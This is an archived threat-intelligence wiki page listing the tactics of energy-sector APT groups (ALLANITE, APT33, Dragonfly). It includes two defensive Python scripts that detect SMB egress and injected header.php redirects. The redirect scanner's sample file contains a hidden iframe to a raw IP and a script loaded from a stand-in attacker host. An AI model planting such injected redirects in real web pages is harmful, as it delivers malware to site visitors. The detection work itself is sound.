This site has been deprecated in favor of https://attack.mitre.org and will remain in place until 11/1/22.

Property:Has technique description

From attackics

This is a property of type Text.

Showing 20 pages using this property.
G
[[Group/G0009|ALLANITE]] utilized spear phishing to gain access to energy sector environments.[[CiteRef::Allanite - EISAC - 201805]]
[[Group/G0009|ALLANITE]] leverages watering hole attacks to gain access to electric utilities.[[CiteRef::Allanite - Security week - 201805]]
[[Group/G0009|ALLANITE]] utilized credentials collected through phishing and watering hole attacks.[[CiteRef::Reference - Dragos - Allanite]]
[[Group/G0009|ALLANITE]] has been identified collecting and distributing screenshots of ICS systems such as HMIs.[[CiteRef::Reference - Dragos - Allanite]][[CiteRef::Alert - Russian APT TA18-074A - 201803]]
[[Group/G0003|APT33]] utilized PowerShell scripts to establish command and control and to install files for execution.[[CiteRef::APT33 - Symantec elfin - 201903]][[CiteRef::Reference - Dragos - Magnallium]]
[[Group/G0003|APT33]] utilizes backdoors capable of capturing screenshots once installed on a system.[[CiteRef::APT33 - Fireeye - 201709]][[CiteRef::APT33 - Elfin Stonedrill - 201703]]
[[Group/G0003|APT33]] sent spear phishing emails containing links to HTML application files, which were embedded with malicious code.[[CiteRef::APT33 - Fireeye - 201709]] [[Group/G0003|APT33]] has conducted targeted spear phishing campaigns against U.S. government agencies and private sector companies.[[CiteRef::APT33 - wired - 201906]]
[[Group/G0006|Dragonfly 2.0]] communicated with command and control over TCP ports 445 and 139 or UDP ports 137 and 138.[[CiteRef::Alert - CISA TA18-074A]]
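The C2 channel described in the entry above is SMB and NetBIOS traffic, which has no legitimate reason to leave an internal network. As an added example (not code from the attackics site or from any cited report), the Python below scans constructed connection records in a Zeek conn.log-like layout and flags SMB/NetBIOS flows from an internal address to an address outside the assumed internal ranges. The sample records, the internal address ranges and the function names are assumptions made for this illustration.

```python
import ipaddress
from typing import List, Tuple

# Ports the entry attributes to Dragonfly 2.0 C2: SMB over TCP 445/139 and
# NetBIOS over UDP 137/138.
SMB_TCP_PORTS = {445, 139}
NETBIOS_UDP_PORTS = {137, 138}

# What counts as "internal" is a per-site decision; RFC 1918 plus loopback and
# link-local is assumed here. (Python's is_private also treats the TEST-NET
# documentation ranges used in the sample as private, so membership is checked
# against an explicit list instead.)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]

# Constructed sample records (not real telemetry) in a Zeek conn.log-like
# tab-separated layout: ts, src_ip, src_port, dst_ip, dst_port, proto.
SAMPLE_CONN_LOG = """\
1521000001.100\t10.10.20.15\t49311\t10.10.20.5\t445\ttcp
1521000002.250\t10.10.20.15\t49320\t203.0.113.77\t445\ttcp
1521000003.400\t10.10.20.31\t137\t203.0.113.77\t137\tudp
1521000004.800\t10.10.20.31\t52001\t198.51.100.9\t443\ttcp
1521000005.900\t10.10.30.8\t61000\t10.10.30.2\t139\ttcp
1521000006.000\t10.10.30.8\t61001\t192.0.2.44\t139\ttcp
"""


def is_internal(ip_text: str) -> bool:
    """True when the address falls inside one of the assumed internal ranges."""
    ip = ipaddress.ip_address(ip_text)  # raises ValueError on garbage
    return any(ip in net for net in INTERNAL_NETS)


def is_smb_or_netbios(dst_port: int, proto: str) -> bool:
    """SMB on TCP 445/139, NetBIOS name/datagram service on UDP 137/138."""
    proto = proto.lower()
    return (proto == "tcp" and dst_port in SMB_TCP_PORTS) or (
        proto == "udp" and dst_port in NETBIOS_UDP_PORTS
    )


def find_smb_egress(log_text: str) -> List[Tuple[str, str, int, str]]:
    """Return (src_ip, dst_ip, dst_port, proto) for every SMB/NetBIOS flow
    that originates inside the internal ranges and terminates outside them."""
    hits: List[Tuple[str, str, int, str]] = []
    for line in log_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) != 6:
            continue  # malformed record; skip rather than crash the sweep
        _ts, src, _sport, dst, dport, proto = fields
        try:
            dport_i = int(dport)
            src_internal = is_internal(src)
            dst_internal = is_internal(dst)
        except ValueError:
            continue  # unparseable port or address
        if is_smb_or_netbios(dport_i, proto) and src_internal and not dst_internal:
            hits.append((src, dst, dport_i, proto.lower()))
    return hits


if __name__ == "__main__":
    for src, dst, port, proto in find_smb_egress(SAMPLE_CONN_LOG):
        print(f"ALERT outbound {proto}/{port} from {src} to external {dst}")
```

Blocking TCP 139/445 and UDP 137/138 at the perimeter removes this channel outright; the sweep above is for confirming that the block actually holds and for catching hosts that route around it.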
[[Group/G0006|Dragonfly 2.0]] accessed workstations and servers within the corporate network that contained data from power generation control system environments. The files were related to the ICS and SCADA systems, including vendor names and ICS reference documents such as wiring diagrams and panel layouts.[[CiteRef::Alert - CISA TA18-074A]]
[[Group/G0006|Dragonfly 2.0]] deleted indicators on staging and target devices by uninstalling software and removing event logs, batch scripts, screenshots, registry keys, documents, and tools they had brought into the target networks.[[CiteRef::Alert - CISA TA18-074A]]
[[Group/G0006|Dragonfly 2.0]] has been reported to take screenshots of the GUI for ICS equipment, such as HMIs.[[CiteRef::Alert - CISA TA18-074A]]
[[Group/G0006|Dragonfly 2.0]] used the Phishery toolkit to conduct spear phishing attacks and gather credentials.[[CiteRef::Dragonfly 2.0 - Symantec]][[CiteRef::Dragonfly 2.0 - talos phishing - 201707]] [[Group/G0006|Dragonfly 2.0]] conducted a targeted spear phishing campaign against multiple electric utilities in North America.[[CiteRef::Dragonfly 2.0 - Dragos - 201809]][[CiteRef::Dragonfly 2.0 - Dragos activity groups - 2018]]
[[Group/G0006|Dragonfly 2.0]] utilized watering hole attacks to gather credentials by compromising websites that energy sector organizations might access.[[CiteRef::Dragonfly 2.0 - Symantec]] A line of code injected into the header.php file redirected visitors to an adversary-controlled IP address.[[CiteRef::Alert - CISA TA18-074A]]
[[Group/G0006|Dragonfly 2.0]] deleted indicators on staging and target devices by uninstalling software and removing event logs, batch scripts, screenshots, registry keys, documents, and tools they had brought into the target networks.[[CiteRef::Alert - CISA TA18-074A]]
[[Group/G0006|Dragonfly 2.0]] leveraged compromised user credentials to access the targets' networks and download tools from a remote server.[[CiteRef::Reference - Dragos - Dymalloy]][[CiteRef::Alert - CISA TA18-074A]]
[[Group/G0006|Dragonfly 2.0]] captured ICS vendor names, reference documents, wiring diagrams, and panel layouts about the process environment.[[CiteRef::Alert - CISA TA18-074A]]
[[Group/G0006|Dragonfly 2.0]] trojanized legitimate software to deliver malware disguised as standard Windows applications.[[CiteRef::Dragonfly 2.0 - Symantec]]
[[Group/G0002|Dragonfly]] conducted a targeted phishing campaign against energy sector executives and senior personnel. Deceptive subject lines were used to convey high importance. Malicious PDFs were then used to infect the user's device.[[CiteRef::Symantec Dragonfly]]
[[Group/G0002|Dragonfly]] trojanized legitimate ICS equipment providers' software packages available for download on their websites.[[CiteRef::Symantec Dragonfly]]
[[Group/G0002|Dragonfly]] utilized watering hole attacks on energy sector websites by injecting a redirect iframe to deliver [[Software/S0003|Backdoor.Oldrea]] or [https://attack.mitre.org/software/S0094/ Trojan.Karagany].[[CiteRef::Symantec Dragonfly]]
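Two entries above describe the same watering hole mechanism from different angles: a redirect line injected into a theme's header.php (Dragonfly 2.0) and a redirect iframe injected into energy sector sites (Dragonfly). As an added example, not code from the attackics site or from the cited Symantec or CISA reports, the Python below sweeps a constructed header.php for frames, scripts, meta refreshes and PHP/JS redirects that reference hosts outside an assumed allowlist, and marks raw-IP destinations and zero-size or hidden frames, the two signatures a web-server owner would most want surfaced. The allowlist, the sample file contents, the hostnames and the function names are constructed assumptions.

```python
import ipaddress
import re
from typing import Dict, List, Set

# Hosts this site legitimately references from its theme header. Anything
# else pulled in by a frame, script, meta refresh or redirect is suspect.
# (Assumed allowlist for the constructed sample; a real one is site-specific.)
ALLOWED_HOSTS: Set[str] = {"www.example-utility.com", "cdn.example-cdn.net"}

# Lines worth inspecting: frames, scripts, meta refreshes and PHP/JS redirects.
REDIRECT_TAG_RE = re.compile(
    r'<iframe\b|<script\b|http-equiv\s*=\s*["\']refresh'
    r'|\bheader\s*\(\s*["\']Location|location\.(?:href|replace)',
    re.IGNORECASE,
)
# Absolute or protocol-relative URL; captures the host (IPv4 or name, no port).
URL_RE = re.compile(r'(?:https?:)?//([A-Za-z0-9.\-]+)', re.IGNORECASE)
# Styling that makes an injected frame invisible to the visitor.
HIDDEN_RE = re.compile(
    r'display\s*:\s*none|visibility\s*:\s*hidden|\b(?:width|height)\s*=\s*["\']?0\b',
    re.IGNORECASE,
)

# Constructed theme header for this example; not taken from any real site.
SAMPLE_HEADER_PHP = """\
<?php /* constructed theme header for this example, not a real site file */ ?>
<head>
<link rel="stylesheet" href="/wp-content/themes/acme/style.css">
<script src="https://cdn.example-cdn.net/jquery.min.js"></script>
<script src="//www.example-utility.com/js/site.js"></script>
<iframe src="http://203.0.113.50/stat.php" width="0" height="0" style="display:none"></iframe>
<script src="http://evil-example.invalid/loader.js"></script>
<?php wp_head(); ?>
</head>
"""


def host_is_ip(host: str) -> bool:
    """True when the URL host is a bare IP address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_injected_redirects(source: str, allowed_hosts: Set[str]) -> List[Dict]:
    """Report frame/script/redirect lines that reference hosts outside the allowlist.

    Each finding records the line number, the offending host, whether that host
    is a raw IP, whether the line is a hidden iframe, and the line text."""
    findings: List[Dict] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if not REDIRECT_TAG_RE.search(line):
            continue
        hidden_frame = "<iframe" in line.lower() and bool(HIDDEN_RE.search(line))
        for match in URL_RE.finditer(line):
            host = match.group(1).lower()
            if host in allowed_hosts:
                continue
            findings.append({
                "line": lineno,
                "host": host,
                "raw_ip": host_is_ip(host),
                "hidden_frame": hidden_frame,
                "text": line.strip(),
            })
    return findings


if __name__ == "__main__":
    for f in find_injected_redirects(SAMPLE_HEADER_PHP, ALLOWED_HOSTS):
        flags = ("raw-ip " if f["raw_ip"] else "") + ("hidden-frame" if f["hidden_frame"] else "")
        print(f"line {f['line']}: {f['host']} {flags.strip()}\n    {f['text']}")
```

The allowlist is the part that needs upkeep: a legitimate CDN or analytics host that is missing from it shows up as a finding, which is the right failure direction for a file that should change rarely. Pair the sweep with file-integrity monitoring on the theme directory so that an injected line is caught when it lands rather than at the next review.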